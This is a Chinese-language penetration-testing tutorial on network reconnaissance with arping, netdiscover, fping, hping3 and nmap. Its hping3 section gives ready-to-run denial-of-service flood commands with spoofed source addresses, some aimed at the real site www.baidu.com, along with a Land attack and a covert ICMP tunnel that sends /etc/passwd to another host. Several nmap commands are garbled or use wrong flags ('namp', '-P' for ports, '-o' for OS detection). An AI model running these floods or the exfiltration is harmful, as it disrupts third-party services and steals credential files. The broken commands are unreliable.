信息收集是web渗透,漏洞挖掘的前期工作
信息收集分为主动收集和被动收集
主动收集:通过直接访问,扫描网站,这种将流量流经网站的行为,如nmap扫描端口
被动收集:利用第三方服务对目标进行访问,比如通过搜索引擎搜索,防止被发现
主动收集
二层主动发现
1.arping
arp地址解析协议,根据ip找mac地址
但是需要注意的是arp只能在局域网中解析,不能跨网段解析的
可以看到4个包被收到了,表示主机存活
当有多块网卡的时候,指定特定的设备来发送请求包
arping -i eth1 -c 1 192.168.131.155
2.netdiscover
netdiscover也是arp二层侦探工具,但是可以一次性侦探一个网段内在线的主机,支持主动及被动侦探
被动扫描,不发送任何内容,只发送嗅探针
netdiscover -p
netdiscover -i eth0 -r 192.168.31.0/24 -p
主动扫描一个网段
netdiscover -i eth0 -r 192.168.152.0/24
三层发现
ping
ping -c 3 192.68.131.24
- -c 后接次数
fping
和ping命令相比,可以ping多个地址,或者一个网段的地址
fping -s -g 192.168.152.130 192.168.152.140
ping一段地址
fping 50.116.66.139 173.194.35.35 98.139.183.24
ping多个地址
fping -ags 192.168.152.0/24 > test.txt
ping一个网段地址
- -a alive存活
- -s stat 打印状态
- -g generate 一个区间段
hping3
hping3 命令可以进行简单的dos攻击!!!!
hping3 -c 100000 -d 120 --udp -w 64 -p 80 --flood --rand-source www.baidu.com
hping3 -c 10000 -d 120 --icmp -w 64 -p 80 --flood --rand-source www.baidu.com
hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood -a 192.168.152.31 192.168.152.31
-
-c 接发送请求次数
-
-d 发送数据包大小
-
-S set sync flag 建立sync连接,也就是对方需要和我进行三次握手,以占用资源
-
-w 滑动窗口,发送字节大小
-
–flood 尽快发送数据包,不显示回复
-
–rand-source 源地址欺
-
-a 源地址欺骗
-
-I 接指定网口
*-i 接等待攻击的时间
以 LandAttack 方式测试目标防火墙 (Land Attack 是将发送源地址设置为与目标地址相同,诱使目标机与自己不停地建立连接)
hping3 -S -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10
使用 Hping3 可以很方便构建拒绝服务攻击。比如对目标机发起大量 SYN 连接,伪造源地址为 192.168.10.99,并使用1000微秒的间隔发送各个 SYN 包
hping3 -a 192.168.10.99 -S -i u1000 -I eth0 123.123.23.23 -p 80
Hping3 支持通过 TCP/UDP/ICMP 等包来进行文件传输。相当于借助 TCP/UDP/ICMP 包建立隐秘隧道通讯。实现方式是开启监听端口,对检测到的签名 (签名为用户指定的字符串) 的内容进行相应的解析。
在接收端开启服务:
hping3 192.168.1.159 --listen signature --safe --icmp
监听 ICMP 包中的签名,根据签名解析出文件内容。
在发送端使用签名打包的 ICMP 包发送文件:
hping3 192.168.1.108 --icmp -d 100 --sign signature --file /etc/passwd
将 /etc/passwd 密码文件通过 ICMP 包传给 192.168.1.108 主机。发送包大小为100字节 (-d 100),发送签名为 signature (–sign signature)。
四层发现
nmap
nmap是一个网络探测和安全扫描程序,可获取主机信息,及主机上的服务信息
- 扫描一个机器的所有进程服务
namp xxx.xxx.xxx.xxx
- 只扫描1-200端口的服务
nmap -P 1-200 192.168.152.135
- 扫描操作系信息
nmap -o -P 1-5000 xxx.xxx.xxx.xxx
- 扫描多个地址
nmap 192.168.152.135 192.168.152.138
- 扫描一个地址段
nmap 192.168.152.135-250
- 查看运用TCP/UDP技术扫描192.168.152.130的情况
nmap -sT 192.168.152.130
nmap -sU 192.168.152.130